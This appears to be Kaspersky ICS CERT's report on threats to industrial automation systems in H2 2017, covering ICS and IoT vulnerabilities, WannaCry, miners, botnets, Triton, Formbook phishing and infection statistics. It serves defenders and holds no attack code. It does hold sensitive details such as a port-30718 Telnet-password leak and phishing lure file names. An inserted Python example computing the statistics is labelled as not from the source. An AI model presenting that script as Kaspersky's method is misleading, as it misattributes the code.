[PROFINET Discovery and Configuration Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-129-01H>). 
The security issues identified affect entire product families.\n\n### Impact of vulnerabilities in 'traditional' technologies on industrial systems\n\nIn addition to ICS-specific vulnerabilities, a number of serious flaws were identified in H2 2017 in software platforms and network protocols that can be exploited to attack industrial systems.\n\nThe vulnerabilities in the WPA2 protocol unexpectedly turned out to be relevant to industrial solutions. They were found to [affect](<https://ics-cert.kaspersky.com/news/2017/11/15/ics-krack/>) equipment from several vendors, including Cisco, Rockwell Automation, Sierra Wireless, ABB and Siemens. Industrial control systems were also affected by multiple vulnerabilities in [the Dnsmasq DNS server](<https://ics-cert.kaspersky.com/news/2017/12/05/dnsmasq/>), [Java Runtime Environment](<https://ics-cert.us-cert.gov/advisories/ICSA-17-213-02>), [Oracle Java SE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-262-01>), and [Cisco IOS and IOS XE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-094-04>).\n\nVulnerabilities in Intel products can also affect the security of industrial equipment. In the second half of 2017, [information on several vulnerabilities in Intel products](<https://ics-cert.kaspersky.com/news/2017/11/24/intel-updates/>) (ME, SPS and TXE) was published. These vulnerabilities affect mainly SCADA server hardware and industrial computers that use vulnerable CPUs. These include, for example, Automation PC 910 by B&R, Nuvo-5000 by Neousys and the GE Automation RXi2-XP product line. As a rule, vendors do not consider it necessary to release public advisories on vulnerabilities of this type (derived from using third-party technologies). Of course, there are some positive exceptions. For example, Siemens AG has released [an advisory](<https://ics-cert.kaspersky.com/news/2018/03/01/siemens-intel/>) stating that these vulnerabilities affect a range of the company's products. 
Earlier, the company published [information](<https://cert-portal.siemens.com/productcert/pdf/ssa-874235.pdf>) about similar vulnerabilities in Intel technologies affecting its products.\n\n### IoT device vulnerabilities\n\n2017 was marked by a growing number of vulnerabilities being identified in internet of things (IoT) devices. As a consequence, such vulnerabilities were increasingly often exploited to create botnets. The activity of three new botnets was uncovered in the last two months of 2017 only. These included the [Reaper botnet](<https://ics-cert.kaspersky.com/news/2017/11/09/reaper/>) and new Mirai variants, including the [Satori botnet](<https://ics-cert.kaspersky.com/news/2017/12/14/satori/>).\n\nMultiple vulnerabilities were identified in [Dlink 850L routers](<https://blogs.securiteam.com/index.php/archives/3364>), [WIFICAM wireless IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>), [Vacron network video recorders](<https://blogs.securiteam.com/index.php/archives/3445>) and other devices.\n\nOn top of the new IoT device flaws, some old vulnerabilities are still not closed, such as [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) in Realtek devices and the vulnerability dating back to 2012 that can be exploited to get the configuration of [Serial-to-Ethernet converters](<https://www.bleepingcomputer.com/news/security/thousands-of-serial-to-ethernet-devices-leak-telnet-passwords/>), including the Telnet password, by sending a request on port 30718. The vulnerability in Serial-to-Ethernet converters directly affects the industrial internet of things (IIoT), since many systems that enable the operators of industrial equipment to remotely control its status, modify its settings and control its operation are based on serial interface converters.\n\nThe security of IoT devices is also affected by issues relating to the security of traditional information technology. 
Specifically, vulnerabilities in implementations of the Bluetooth protocol led to the emergence of the new attack vector, [BlueBorne](<https://ics-cert.kaspersky.com/news/2017/09/15/blueborne/>), which poses a threat to mobile, desktop and IoT operating systems.\n\n## Vulnerabilities identified by Kaspersky Lab ICS CERT\n\nIn 2017, Kaspersky Lab ICS CERT experts not only analyzed the security issues associated with different vendors' ICS components, but also focused on the common ICS components, platforms and technologies used in different vendors' solutions. This type of research is important because vulnerabilities in such components significantly increase the number of potential attack victims. Research in this area continues in 2018.\n\n### Number of vulnerabilities identified\n\nBased on its research, Kaspersky Lab ICS CERT identified 63 vulnerabilities in industrial and IIoT/IoT systems in 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130435/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-4.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby types of components analyzed_\n\nEvery time we identified a vulnerability, we promptly notified the respective product's vendor.\n\n### Number of CVE entries published\n\nDuring 2017, 11 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT. It should be noted that some of these CVE entries were published after vendors closed vulnerabilities information on which had been provided to them in 2016.\n\nInformation on other vulnerabilities identified by Kaspersky Lab ICS CERT experts will be published after these vulnerabilities are closed by the respective vendors.\n\n### Capabilities provided by the vulnerabilities identified\n\nThe largest number of vulnerabilities identified (29) could allow an attacker to cause denial of service (DoS) remotely. 
8% of the vulnerabilities identified could allow an attacker to execute arbitrary code remotely on the target system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130442/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-5.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby capabilities provided_\n\n### Vulnerabilities in ICS components\n\nIn 2017, Kaspersky Lab ICS CERT experts identified 30 vulnerabilities in ICS products from different vendors. These are mainly large automation system vendors, such as Schneider Electric, Siemens, Rockwell Automation, Emerson, and others.\n\n#### Severity ratings of the vulnerabilities identified\n\nTo assess the severity of vulnerabilities identified in ICS components, Kaspersky Lab ICS CERT used its own vulnerability rating system based on the metrics defined in [CVSS v3.0](<https://www.first.org/cvss/v2/faq>) (Common Vulnerability Scoring System) standard, with the following vulnerability severity levels identified:\n\n * least severe: CVSS v3.0 base score of 5.0 or less,\n * medium severity: CVSS v3.0 base score of 5.1 to 6.9 (inclusive),\n * most severe: CVSS v3.0 base score of 7.0 or more.\n\nThe absolute majority of vulnerabilities identified are in the most severe group. These include the [XXE vulnerability in industrial solutions](<https://ics-cert.kaspersky.com/news/2017/09/07/closing-an-xxe-vulnerability-in-siemens-industrial-solutions/>) that use the Discovery Service of the OPC UA protocol stack.\n\n#### Vulnerabilities in OPC UA implementations\n\nOne of the research areas involved searching for vulnerabilities in different implementations of the OPC UA technology. This type of research is needed to improve the overall security level of products from different vendors that use the technology in their solutions. 
Vulnerabilities in such technologies are a Swiss army knife of sorts for attackers, enabling them to hack industrial systems from different vendors.\n\nA total of 17 critical denial-of-service vulnerabilities were identified during the period.\n\nSome of the vulnerabilities were identified in sample software implementations of various OPC UA functions available in the official GitHub repository. In the process of communicating with several vendors of industrial automation systems, we found out that many of them had used code from such samples in their product code. This means that the vulnerabilities identified may affect complete product lines from different vendors.\n\n### Vulnerabilities in third-party hardware-based and software solutions\n\nKaspersky Lab ICS CERT experts have also analyzed third-party hardware-based solutions that are widely used in industrial automation systems.\n\nSpecifically, experts analyzed the SafeNet Sentinel hardware-based solution by Gemalto. As a result of the research, [15 vulnerabilities](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>) were identified in the software part of the solution (11 in December 2016 and 4 in 2017). These flaws affect a large number of products that use the vulnerable software, including solutions by ABB, General Electric, HP, Cadac Group, Zemax and other software developers, the number of which may reach 40 thousand, according to some estimates.\n\n### Vulnerabilities in internet of things (IoT and IIoT) components\n\nAnother area of research was the assessment of the information security status of internet of things (IoT) components, including industrial internet of things (IIoT) components.\n\nKaspersky Lab experts are working with vendors to improve the security of their solutions with respect to 11 vulnerabilities identified. 
Vulnerabilities were found in the following components and solutions:

 * smart cameras,
 * hardware-based IIoT solutions.

It should be noted that vulnerabilities in implementations of OPC UA standards, which are discussed above, also directly affect IIoT security.

### Vulnerabilities in industrial routers

In the past year, 18 vulnerabilities were identified in industrial networking equipment from different vendors. Typical vulnerabilities: information disclosure, privilege escalation, arbitrary code execution, denial of service.

### Working with software vendors

With respect to information on the vulnerabilities identified, Kaspersky Lab follows the principle of responsible disclosure, promptly reporting vulnerabilities to the respective software vendors.

In 2017, Kaspersky Lab ICS CERT researchers actively collaborated with various companies to ensure that the vulnerabilities identified would be closed.

Of the 63 vulnerabilities identified by Kaspersky Lab ICS CERT in 2017, vendors closed 26. Vulnerabilities were closed by Siemens, General Electric, Rockwell Automation, Gemalto and the [OPC Foundation](<https://en.wikipedia.org/wiki/OPC_Foundation>) industrial consortium.

It should be noted that most vendors of software for industrial automation systems that we have worked with have lately been devoting much more care and resources to the task of closing the vulnerabilities identified and fixing information security issues in their products, including their earlier versions.

At the same time, the issue of closing vulnerabilities in industrial automation systems remains relevant. In many cases, it takes large vendors a long time to close vulnerabilities in their products. Sometimes software vendors decide to patch only new versions of a vulnerable product, which they are planning to release in the future.

In addition, some vendors still need to improve the organizational and technical aspects of the procedures they use to inform customers about the vulnerabilities patched. Even after an update has been released, many users are unaware of the relevant security issue and continue to use vulnerable versions of the product. This is particularly important for embedded software, as well as the technologies and specific program modules used by numerous third-party vendors (one example can be found [here](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>)).

Positive examples include Siemens and the OPC Foundation, which have quickly closed the vulnerabilities identified and released public advisories on existing vulnerabilities.

## Malware in industrial automation systems

As we have [mentioned before](<https://ics-cert.kaspersky.com/reports/2017/03/28/threat-landscape-for-industrial-automation-systems-in-the-second-half-of-2016/#3l3>), many industrial companies use modern networking technologies that improve the transparency and efficiency of enterprise management processes, as well as providing flexibility and fault tolerance for all tiers of industrial automation. As a result, industrial networks are increasingly similar to corporate networks – both in terms of use case scenarios and in terms of the technologies used.
The unfortunate flip side of this is that internet threats, as well as other traditional IT threats, increasingly affect the industrial networks of modern organizations.

In the second half of 2017, Kaspersky Lab security solutions installed on industrial automation systems detected over 17.9 thousand different malware modifications from about 2.4 thousand different malware families.

### Accidental infections

In the vast majority of cases, attempts to infect ICS computers are accidental and are not part of targeted attacks. Consequently, the functionality implemented in malware is not specific to attacks on industrial automation systems. However, even without ICS-specific functionality, a malware infection can have dire consequences for an industrial automation system, including an emergency shutdown of the industrial process. This was demonstrated by the WannaCry outbreak in May 2017, when several enterprises in different industries had to suspend their industrial processes after being infected with the encryption malware. We wrote about encryption malware-related threats in our [previous report](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/>) and several articles (see [here](<https://ics-cert.kaspersky.com/reports/2017/06/22/wannacry-on-industrial-networks/>) and [here](<https://ics-cert.kaspersky.com/alerts/2017/06/29/more-than-50-percent-of-organizations-attacked-by-expetr-petya-cryptolocker-are-industrial-companies/>)).

#### Unexpected consequences of the WannaCry outbreak

It is important to note that some IT threats can do much more significant harm in an industrial network than in an office network. To demonstrate this, we look at two incidents investigated by the Kaspersky Lab ICS-CERT team.

In H2 2017, we were approached by several industrial enterprises at once, where mass infections of industrial networks with WannaCry encryption malware had been detected. It was later determined that the initial infections of office networks at the victim companies had in all the cases taken place back in the first half of 2017, at the height of the WannaCry outbreak. However, the infections were not noticed until the malware propagated to the enterprises' industrial networks. As it turned out during investigation, the encryption functionality in the malware samples was damaged, and the infected systems on corporate networks continued to operate normally, without any failures. However, the infection of industrial networks in these cases had unexpected negative consequences.

At one of the enterprises infected by WannaCry, the workstations used by operators started to bring up the Blue Screen of Death all the time, leading to emergency reboots. The reason for this unexpected consequence of infection was that the machines ran Windows XP. It is a well-known fact that the DoublePulsar exploit used by WannaCry to propagate causes Windows XP to crash, resulting in a Blue Screen of Death and a reboot. In cases when numerous machines in the industrial segment of an organization's network are infected, Windows XP machines are often attacked and go into emergency reboots. As a result, operators are rendered incapable of monitoring and controlling the industrial process. This makes WannaCry a denial-of-service attack tool of sorts.

In another incident, the propagation of WannaCry caused some of the devices on an enterprise's industrial network to become temporarily unavailable during periods when the network activity of the malware coincided with certain stages in the industrial process.
This resulted in emergency interruptions of an industrial process that was critical for the enterprise for an average of 15 minutes.

#### Cryptocurrency miners in industrial network infrastructure

According to Kaspersky Lab ICS CERT data, cryptocurrency mining programs attacked 3.3% of industrial automation system computers during the period from February 2017 to January 2018.

Up to August 2017, the percentage of ICS computers attacked by cryptocurrency miners did not exceed 1%. This figure grew in September and did not go back to less than 1% for the rest of 2017. In October, cryptocurrency miner attacks against ICS computers peaked, with 2.07% of ICS computers being attacked.

_Percentage of ICS computers attacked by cryptocurrency mining malware_

Like other malware infecting systems at industrial enterprises, cryptocurrency miners can pose a threat to industrial process monitoring and control. In the process of its operation, malware of this type creates a significant load on the computer's computational resources. An increased load on processors can negatively affect the operation of the enterprise's ICS components and threaten their stability.

According to our assessments, in most cases cryptocurrency miners infect ICS computers accidentally. There is no reliable information on machines that are part of the industrial network infrastructure being infected as a result of targeted attacks whose goal is to mine cryptocurrencies, with the exception of cases when miners are installed by unscrupulous employees of victim enterprises. The cryptocurrency mining malware typically enters the industrial network infrastructure from the internet or, less commonly, from removable media or network shares.

_Sources of ICS computer infections with cryptocurrency miners. Percentage of systems attacked, February 2017 – January 2018_

Cryptocurrency miners have infected numerous websites, including those of industrial companies. In such cases, cryptocurrencies are mined on the systems of users who visit infected web resources. This technique is called cryptojacking.

_Screenshot showing a fragment of code found on a web resource infected with mining malware_

#### Botnet agents in the industrial network infrastructure

In most cases, the functionality of botnet agents includes searching for and stealing financial information, stealing authentication data, brute forcing passwords, sending spam, as well as conducting attacks on specified remote internet resources, including distributed denial-of-service (DDoS) attacks. In addition, in cases where a botnet agent attacks third-party resources (such cases have been detected), the companies that own the IP addresses from which the attacks are launched may face certain reputational risks.

Although the destructive activity of botnet agents is not specifically designed to disrupt the operation of any industrial system, an infection with this type of malware may pose a significant threat to a facility that is part of the industrial infrastructure. Malware of this type can cause network failures and denial of service (DoS) of the infected system and other devices on the network.
It is also common for malware to contain errors in its code and/or be incompatible with software used to control the industrial infrastructure, potentially resulting in the disruption of industrial process monitoring and control.

Another danger associated with botnet agents is that malware of this type often includes data collection functionality and, like backdoor malware, enables the attackers to control the infected machine surreptitiously. The system data collected by bots by default is sufficient for accurately identifying the company that owns the system and the type of the infected system. What's more, access to machines infected with botnet agents is often put up for sale at specialized exchanges on the Darknet. Consequently, threat actors interested in infected industrial control systems can gain access to a victim company's sensitive data and/or systems used to control the industrial infrastructure.

In 2017, 10.8% of all ICS systems were attacked by botnet agents. Moreover, botnet agent attack statistics show that 2% of ICS systems were attacked by several malicious programs of this type at once.

_Percentage of ICS computers attacked by botnet agents in 2017_

The main sources of botnet agent attacks on ICS systems in 2017 were the internet, removable media and email messages.

_Sources of ICS infection with botnet agents, percentage of ICS computers attacked, 2017_

This once again demonstrates the need for access control to ensure that information is exchanged securely between an enterprise's industrial network and other networks, as well as the need to block unauthorized removable media from connecting to ICS systems and to install tools designed to detect and filter malicious objects from email messages.

_Top 5 botnet agents most commonly found on ICS systems in 2017, percentage of ICS computers attacked_

Nearly two percent of all systems analyzed were attacked with Virus.Win32.Sality malware. In addition to infecting other executable files, this malware includes functionality for resisting antivirus solutions and downloading additional malicious modules from the command-and-control server. The most widespread Sality modules are components for sending spam, stealing authentication data stored on the system and downloading and installing other malware.

The Dinihou botnet agent, which attacked 0.9% of ICS systems analyzed, is in second position. The malware includes functionality that enables the attackers to upload an arbitrary file from an infected system, creating the threat of sensitive data leaks for victim organizations. In addition, both Worm.VBS.Dinihou and Virus.Win32.Nimnul, which is in third place with 0.88%, can be used to download and install other malware on infected systems.

Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.

The fifth position is taken up by Backdoor.Win32.Androm, which ranked highest based on the number of attacks on ICS systems in H2 2016.
The malware provides the attackers with a variety of information on the infected system and enables them to download and install modules for performing destructive activities, such as stealing sensitive data.

### Targeted attacks

2017 saw the publication of information on two targeted attacks on systems that are part of the industrial infrastructure – [Industroyer](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/#21>) and [Trisis/Triton](<https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html>). In these attacks, for the first time since Stuxnet, threat actors created their own implementations of industrial network protocols, gaining the ability to communicate with devices directly.

#### Trisis/Triton

In December 2017, researchers reported discovering previously unknown malware that targeted critical infrastructure systems. The discovery was made as a result of investigating an incident at an unnamed industrial enterprise. The malicious program was dubbed Triton or Trisis.

The malware is a modular framework that can automatically find Triconex Safety Controllers on the enterprise network, get information on their operating modes and plant malicious code on these devices. Trisis/Triton embeds a backdoor in the device's firmware, enabling the attackers to remotely read and modify not only the code of the legitimate control program, but also the code of the compromised Triconex device's firmware. With such capabilities, attackers can do serious damage to the enterprise's industrial process. The least harmful of the possible negative consequences is an emergency shutdown of the system and interruption of the industrial process. It was this type of event that caused a victim organization to launch an investigation, which resulted in the attack being detected.

It remains unknown how the attackers penetrated the enterprise's infrastructure. What is known is that they must have been inside the compromised organization's network for a sufficiently long time (several months) and used legitimate software and 'dual-use' utilities for lateral movement and privilege escalation.

Although the attack was designed to modify code on Triconex devices, the code that the attackers were apparently trying to inject in the last stage of the attack has never been found, so it is currently impossible to determine the final objective of the attack.

#### Spear phishing — Formbook spyware

Spear phishing attacks on industrial organizations continued in the second half of 2017. We have already [written](<https://ics-cert.kaspersky.com/reports/2017/06/15/nigerian-phishing-industrial-companies-under-attack/>) about spear phishing used by threat actors in Business Email Compromise (BEC) attacks. Compared to the attacks described earlier, the attackers' tactics have not changed significantly. However, in addition to known Trojan-Spy malware sent in phishing emails to global industrial and energy companies (FareIT, HawkEye, ISRStealer, etc.), a new representative of this malware class – Formbook – gained popularity in the second half of 2017.

Formbook attacks involve sending phishing emails with malicious Microsoft Office documents attached. To download and install malware on target systems, these documents exploit the CVE-2017-8759 vulnerability or use macros. Some phishing emails include attached archives of different formats containing the malicious program's executable file. Examples of attached file names:

 * RFQ for Material Equipment for Aweer Power Station H Phase IV.exe
 * Scanned DOCUMENTS & Bank Details For Confirmation.jpeg (Pages 1- 4) -16012018.jpeg.ace
 * PO & PI Scan.png.gz
 * zip
 * QUOTATION LISTS.CAB
 * shipping receipts.ace

_Sample phishing email used to distribute Formbook_

In terms of implementation and the techniques used to obfuscate the code and encrypt the payload, Formbook differs from its 'peers' in that its functionality is more extensive. In addition to standard spyware features, such as taking screenshots, capturing keystrokes and stealing passwords stored in browsers, Formbook can steal sensitive data from HTTP/HTTPS/SPDY/HTTP2 traffic and web forms. Additionally, the malware implements remote system control functionality and uses an unusual technique to resist the analysis of network traffic. The Trojan generates a set of URLs to which it is going to connect, using a list of legitimate domains stored in its body. It then adds one URL for its command-and-control server. In this way, the malware attempts to mask its connections to the malicious domain by sending numerous requests to legitimate resources, making its detection and analysis more difficult.

## Threat statistics

_All statistical data used in this report was collected using the [Kaspersky Security Network](<https://kas.pr/Gzu1>) (KSN), a distributed antivirus network. The data was received from those KSN users who gave their consent to have data anonymously transferred from their computers. We do not identify the specific companies/organizations sending statistics to KSN, due to product limitations and regulatory restrictions._

### Methodology

The data was received from ICS computers protected by Kaspersky Lab products that Kaspersky Lab ICS CERT categorizes as part of the industrial infrastructure at organizations.
This group includes Windows computers that perform one or several of the following functions:

 * supervisory control and data acquisition (SCADA) servers,
 * data storage servers (Historian),
 * data gateways (OPC),
 * stationary workstations of engineers and operators,
 * mobile workstations of engineers and operators,
 * Human Machine Interface (HMI).

The statistics analyzed also include data received from computers of industrial control network administrators and software developers who develop software for industrial automation systems.

For the purposes of this report, attacked computers are those on which our security solutions have been triggered at least once during the reporting period. When determining percentages of machines attacked, we use the ratio of _unique_ computers attacked to all computers in our sample from which we received anonymized information during the reporting period.

ICS servers and stationary workstations of engineers and operators often do not have full-time direct internet access due to restrictions specific to industrial networks. Internet access may be provided to such computers, for example, during maintenance periods.

Workstations of system/network administrators, engineers, developers and integrators of industrial automation systems may have frequent or even full-time internet connections.

As a result, in our sample of computers categorized by Kaspersky Lab ICS CERT as part of the industrial infrastructure of organizations, about 40% of all machines have regular or full-time internet connections. The remaining machines connect to the internet no more than once a month, many less frequently than that.

### Percentage of computers attacked

In the second half of 2017, Kaspersky Lab products blocked attempted infections on **37.8%** of ICS computers protected by them, which is 0.2 percentage points more than in the first half of 2017 and 1.4 percentage points less than in the second half of 2016.

June – August 2017 saw a decline in the number of attacked computers. However, in September there was a notable increase in cybercriminal activity, with the proportion of attacked machines rising to 20% and not falling below that level again for the rest of the year.

_Percentage of ICS computers attacked globally by month, 2017_

When comparing these values with the same period in 2016, we see that the July numbers are practically identical. However, for all other months the percentage of attacked machines in 2016 was higher than in 2017.

_Percentage of ICS computers attacked globally by month, H2 2017 vs H2 2016_

A certain decrease in the percentage of computers attacked can be attributed to several factors. It is likely that one has to do with industrial enterprises paying more attention to the security of industrial segments on their networks. According to our experts' assessments, changes for the better may be largely due to simple measures: enterprises have begun to conduct audits of the industrial segments of their networks, train employees in the principles of cyber-hygiene, more properly differentiate access rights between the corporate and the industrial segments of their networks, etc.

### Percentage of ICS computers attacked in different industries

According to our assessment, medium-size and large companies with mature IT security processes tend to use Kaspersky Lab corporate solutions (mainly Kaspersky Industrial CyberSecurity and Kaspersky Endpoint Security) to safeguard their ICS infrastructure. Many smaller organizations and individual engineers, along with companies whose IT and OT cybersecurity still leaves much to be desired, may rely on Kaspersky Lab consumer solutions to protect their ICS computers. The percentage of such computers attacked by malware during the reporting period is significantly higher compared to the corresponding figures for computers protected by corporate products.

We intentionally excluded statistics coming from our consumer solutions when analyzing attacks on industrial facilities in different industries, using only telemetry data coming from Kaspersky Lab products for corporate users.
This resulted in lower average attacked-computer percentages than for the rest of the analysis results presented in this report, where both Kaspersky Lab corporate and consumer product statistics were used.

_Percentage of ICS computers attacked in different industries*, H2 2017 vs H1 2017_

*In this report, unlike our previous reports, we calculated the percentage of attacked ICS computers for each industry (the ratio of ICS computers attacked in an industry to all ICS computers in that industry).

In previous reports, we included the distribution of attacked ICS computers by industry (the ratio of computers attacked in a given industry to all attacked computers in our sample).

According to statistics on attacks against facilities in different industries, nearly all industries demonstrate similar percentages of attacked ICS computers, which are in the range from 26 to 30 percent.
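The methodology described above (a computer counts as attacked if a detection fired at least once, percentages are taken over unique computers, industry figures use corporate-product telemetry only, and "share of an industry's computers attacked" differs from "distribution of attacked computers across industries") carried out on a small constructed telemetry sample. This is an added illustration, not Kaspersky Lab's own code; the record layout, computer ids, product tiers and industry labels are assumptions.

```python
"""Worked example of the report's 'attacked computers' metrics.

Added illustration, not Kaspersky Lab's own code: the telemetry records, field
names, computer ids and industry labels are constructed. It applies the
definitions from the Methodology section: a computer is attacked if a
detection fired at least once in the period, percentages are computed over
*unique* computers, per-industry figures use corporate-product telemetry only,
and the two industry metrics (share of an industry's computers attacked vs
distribution of attacked computers across industries) are computed side by side.
"""
from collections import defaultdict

# Constructed sample telemetry: (computer id, industry, product tier,
# detections reported in this record). A computer may report several times.
TELEMETRY = [
    ("en-01", "Energy", "corporate", 2),
    ("en-01", "Energy", "corporate", 1),        # same machine again: counted once
    ("en-02", "Energy", "corporate", 0),
    ("en-03", "Energy", "corporate", 1),
    ("en-04", "Energy", "corporate", 0),
    ("co-01", "Construction", "corporate", 0),
    ("co-02", "Construction", "corporate", 5),
    ("co-03", "Construction", "corporate", 0),
    ("co-04", "Construction", "corporate", 0),
    ("co-05", "Construction", "corporate", 1),
    ("co-05", "Construction", "corporate", 0),  # later clean report: still attacked
    ("co-06", "Construction", "corporate", 0),
    ("hm-01", "Construction", "consumer", 1),   # consumer-product telemetry
    ("hm-02", "Energy", "consumer", 4),
]


def unique_computers(records, tier=None):
    """Collapse records to one entry per computer id.

    A computer is 'attacked' if any of its records shows at least one
    detection. `tier` optionally restricts the sample to one product tier.
    """
    computers = {}
    for cid, industry, product_tier, detections in records:
        if tier is not None and product_tier != tier:
            continue
        entry = computers.setdefault(cid, {"industry": industry, "attacked": False})
        if detections > 0:
            entry["attacked"] = True
    return computers


def pct(part, whole):
    """Percentage rounded to one decimal, as in the report's figures."""
    return round(100.0 * part / whole, 1) if whole else 0.0


def attacked_share(records, tier=None):
    """Unique attacked computers / all unique computers in the sample."""
    computers = unique_computers(records, tier)
    attacked = sum(1 for c in computers.values() if c["attacked"])
    return pct(attacked, len(computers))


def attacked_share_by_industry(records):
    """H2 2017 method: attacked computers in an industry / all computers in it."""
    computers = unique_computers(records, tier="corporate")
    total, attacked = defaultdict(int), defaultdict(int)
    for c in computers.values():
        total[c["industry"]] += 1
        attacked[c["industry"]] += int(c["attacked"])
    return {ind: pct(attacked[ind], total[ind]) for ind in total}


def attacked_distribution_by_industry(records):
    """Earlier method: attacked computers in an industry / all attacked computers."""
    computers = unique_computers(records, tier="corporate")
    attacked = defaultdict(int)
    for c in computers.values():
        if c["attacked"]:
            attacked[c["industry"]] += 1
    all_attacked = sum(attacked.values())
    return {ind: pct(n, all_attacked) for ind, n in attacked.items()}


if __name__ == "__main__":
    print("all tiers attacked:      ", attacked_share(TELEMETRY))
    print("corporate only attacked: ", attacked_share(TELEMETRY, tier="corporate"))
    print("share within industry:   ", attacked_share_by_industry(TELEMETRY))
    print("distribution of attacked:", attacked_distribution_by_industry(TELEMETRY))
```

On this sample Energy and Construction each account for half of the attacked machines, yet half of Energy's computers were attacked against a third of Construction's, which is exactly the difference between the two metrics the footnote above describes.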
We believe this may be due to the similarity of ICS architectures used to automate industrial processes at enterprises in various industries and, possibly, similarities in the processes used by enterprises to exchange information with external entities and inside the enterprises themselves.

Two industries were attacked more than others during the reporting period: the figures for Energy (38.7%) and Engineering & ICS Integrators (35.3%) are above 35%.

We believe that the high percentage of attacked ICS systems in the energy sector may be explained, on the one hand, by the greater network connectivity of electric power sector facilities (compared to facilities in other industries) and, on the other hand, perhaps by the fact that, on average, more people have access to the industrial control systems of energy sector facilities than to those at enterprises in other industries.

The supply chain attack vector has infamously been used in some devastating attacks in recent years, which is why the high percentage of attacked ICS computers in Engineering and ICS Integration businesses is a problem serious enough to be noticed.

The only industry whose figures showed significant growth over the six months (+5.2 p.p.) is Construction (31.1%). The reason for the high percentage of ICS computers attacked in construction organizations could be that, for enterprises in the industry, industrial control systems often perform auxiliary functions, were introduced a relatively short time ago and are consequently at the periphery of company owners' and managers' attention. The upshot of this may be that objectives associated with protecting these systems from cyberthreats are regarded as having a relatively low priority. Whatever the reason for the high percentage of attacks reaching industrial control systems in construction and engineering, the fact seems sufficiently alarming. Construction is known to be a highly competitive business, and cyberattacks on industrial organizations in this industry can be used as a means of unfair competition. So far, cyberattacks have been used in the construction industry mainly for purposes associated with the theft of commercial secrets. Infecting industrial control systems may provide threat actors with a new weapon in their fight against competitors.

The three least attacked industries are Mining (23.5%), Logistic & Transportation (19.8%) and ICS Software Development (14.7%).

ICS vendor infections might be very dangerous, because the consequences of an attack, spread over the infected vendor's partner ecosystem and customer base, could be dramatic, as we saw in recent wide-scale incidents such as the exPetr malware epidemic.

This report includes information on ICS computers at educational facilities. These figures include not only ICS systems used in demonstration stands and labs performing instructional and research functions, but also industrial automation systems of various facilities that are part of the infrastructure of educational establishments, such as power supply systems (including power generation and distribution), utilities, etc., as well as ICS used in pilot production facilities.

The figure for educational establishments can be regarded as representing the "background level" of accidental threats affecting ICS systems, considering systems at educational establishments to be as insecure as such systems can get. This is because ICS systems at educational establishments are usually connected to the respective organizations' general-purpose networks and are less isolated from the outside world than the systems of industrial facilities.

At the same time, we believe that attacks on ICS systems at educational establishments can also pose a significant threat to enterprises in different real-sector industries – primarily because universities/colleges maintain working contacts and engage in collaboration with industrial enterprises. This includes joint research labs, engineering and development centers, personnel training and career development centers, etc.

In addition, such ICS systems can be used by attackers to test and debug malicious code and refine attacks against real-sector enterprises.

Education demonstrates the greatest difference between the H1 and H2 percentages of ICS systems attacked. The high figure for H1 was due to the large number of internet-borne attacks, as well as attacks by malware belonging to the [Trojan.Multi.Powercod](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>) family. That malware uses techniques that are similar to those described by our colleagues [here](<https://securelist.com/fileless-attacks-against-enterprise-networks/77403/>). In H1 2017, 9.8% of ICS computers in educational establishments from our sample were attacked by Powercod Trojans.
In H2, the corresponding figure was 0.7%.

### Sources of industrial automation system infection

_Main sources of threats blocked on ICS computers, percentage of ICS computers attacked, H2 2017 vs H1 2017_

In the second half of 2017, most of the numbers for the main infection sources remained at H1 2017 levels.

For computers that are part of the industrial infrastructure, the internet remains the main source of infection. Contributing factors include interfaces between corporate and industrial networks, availability of limited internet access from industrial networks, and connection of computers on industrial networks to the internet via mobile phone operator networks (using mobile phones, USB modems and/or Wi-Fi routers with 3G/LTE support). Contractors, developers, integrators and system/network administrators that connect to the control network externally (directly or remotely) often have unrestricted internet access. Their computers are in the highest-risk group and can be used by malware as a channel for penetrating the industrial networks of the enterprises they serve. As we mentioned above, about 40% of computers in our sample connect to the internet on a regular basis. It should be noted that, in addition to malicious and infected websites, the "Internet" category includes phishing emails and malicious attachments opened in web-based email services (in browsers).

Experts from Kaspersky Lab ICS-CERT note that malicious programs and scripts built into email message bodies are often used in targeted attacks on industrial enterprises. In most cases, the attackers distribute emails with malicious attachments in office document formats, such as Microsoft Office and PDF, as well as archives containing malicious executable files.

There has also been a 1.7 p.p. decrease in the proportion of threats detected while scanning removable media. This is an important indicator, because such devices are often used to transfer information in industrial networks.

The other figures did not change appreciably.

### Classes of malware

_Malware classes, percentage of ICS computers attacked, H2 2017_

Trojan malware, which is designed to penetrate the systems being attacked and to deliver and launch other malware modules, remains relevant to ICS computers. The malicious code of these programs was most commonly written in scripting languages (JavaScript, Visual Basic Script, PowerShell, AutoIt in the AutoCAD format) or took the form of Windows shortcuts (.lnk) that pointed to the next malicious modules.

These Trojans most often tried to download and execute the following malware as main modules:

 * spyware Trojans (Trojan-Spy and Trojan-PSW)
 * ransomware (Trojan-Ransom)
 * backdoors (Backdoor)
 * remote administration tools installed without authorization (RAT)
